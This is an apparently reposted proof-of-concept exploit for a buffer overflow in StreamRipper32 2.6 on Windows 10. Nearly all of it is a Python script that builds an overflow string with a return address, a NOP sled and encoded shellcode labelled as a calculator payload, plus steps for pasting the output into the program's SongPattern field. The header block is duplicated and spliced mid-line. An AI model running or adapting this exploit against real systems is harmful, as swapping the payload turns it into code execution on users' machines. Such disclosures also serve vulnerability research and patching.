StreamRipper32 2.6 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 451

# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC)
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Tested On: Win10 x64
# Download Link: http://streamripper.sourceforge # Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC)
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Tested On: Win10 x64
# Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
# Vendor Page: http://streamripper.sourceforge.net/
# Version: 2.6
# Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern"

#Bad Characters x00x0Ax0D
file = open('exploit.txt', 'wb')

buf = b""
buf += b"A" * 256
buf += b"x47x23x30x74" #74302347
buf += b"x90" * 30

#calc payload
buf += b"xdbxc2xbdx72x07xdaxa7xd9x74x24xf4x58x29"
buf += b"xc9xb1x31x83xe8xfcx31x68x14x03x68x66xe5"
buf += b"x2fx5bx6ex6bxcfxa4x6ex0cx59x41x5fx0cx3d"
buf += b"x01xcfxbcx35x47xe3x37x1bx7cx70x35xb4x73"
buf += b"x31xf0xe2xbaxc2xa9xd7xddx40xb0x0bx3ex79"
buf += b"x7bx5ex3fxbex66x93x6dx17xecx06x82x1cxb8"
buf += b"x9ax29x6ex2cx9bxcex26x4fx8ax40x3dx16x0c"
buf += b"x62x92x22x05x7cxf7x0fxdfxf7xc3xe4xdexd1"
buf += b"x1ax04x4cx1cx93xf7x8cx58x13xe8xfax90x60"
buf += b"x95xfcx66x1bx41x88x7cxbbx02x2ax59x3axc6"
buf += b"xadx2ax30xa3xbax75x54x32x6ex0ex60xbfx91"
buf += b"xc1xe1xfbxb5xc5xaax58xd7x5cx16x0exe8xbf"
buf += b"xf9xefx4cxcbx17xfbxfcx96x7dxfax73xadx33"
buf += b"xfcx8bxaex63x95xbax25xecxe2x42xecx49x1c"
buf += b"x09xadxfbxb5xd4x27xbexdbxe6x9dxfcxe5x64"
buf += b"x14x7cx12x74x5dx79x5ex32x8dxf3xcfxd7xb1"
buf += b"xa0xf0xfdxd1x27x63x9dx3bxc2x03x04x44"
buf += b"x90" * (1000 - len(buf))

file.write(buf)
file.close()